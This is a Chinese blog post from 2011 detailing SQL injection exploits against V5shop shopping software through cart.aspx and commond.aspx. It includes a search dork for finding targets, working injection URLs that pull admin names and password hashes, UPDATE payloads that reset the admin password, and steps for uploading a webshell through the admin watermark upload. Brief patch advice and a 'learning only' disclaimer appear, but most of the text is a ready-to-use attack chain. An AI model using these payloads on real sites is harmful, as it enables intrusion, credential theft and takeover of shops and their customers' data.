注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

冰魂's blog

关注网络技术.

 
 
 
 
 

日志

 
 

[漏洞]V5shop注入漏洞  

2011-08-31 00:23:11|  分类: [安全资讯] |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

漏洞危害:高危
一、漏洞文件:cart.aspx

搜索关键词:inurl:scoreindex.aspx

exp :

域名/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

运行结果如图(红色圈部分就是用户和md5密码):

然后针对爆出来的md5密码进行在线解密,如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。(当然很多时候md5解密是没有结果的)此时需要先更新下管理员密码:

update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

其中pass串先将密码转成32位,再转换成大写,再转换成sql16进制(上面串默认密码是v5shop)

完整语句为:

cart.aspx?act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
)>0 --

 如果顺利,就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。

 进入后台后在系统设置-参数设置-后台上传水印,水印上传那儿貌似可以上传任意文件(可以先上传asp大马,然后再上传aspx大马)。

小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。

修复方法:升级最新8.3版,或者临时把cart.aspx改名或做其它方法处理。

二、漏洞文件:commond.aspx

exp:

/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)
上面这个可以直接显示出管理员用户名

/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)
上面这个可以显示MD5密码

/commond.aspx?id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

上面这个用于更改管理员密码

如果顺利,管理员密码已经被更改成你指定的密码(此处默认为v5shop),然后就可以登陆后台,默认地址:/weblogin,输入上面的用户名和密码既可成功进入后台。

拿shell方法:(未验证)
系统设置->参数设置->后台上传水印.
先传ASP的马..再传ASPX马.
上传后路径:/uploadFile/Picture/*.asp

小结:此方法基本可以做到8.2版本及以下版本通杀,最新版8.3已解决该漏洞。

修复方法:升级最新8.3版,或者临时把commond.aspx改名或做其它方法处理。

提示:使用系统者可以及时升级,阅读此文者请大家仅用于学习,勿用于非法用途。

cart.aspx?act=buy&id=1 update web_admin set pass=0x430030003400360030003200450031003500360038003700300039003500380037004400360045
  评论这张
 
阅读(167)| 评论(1)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017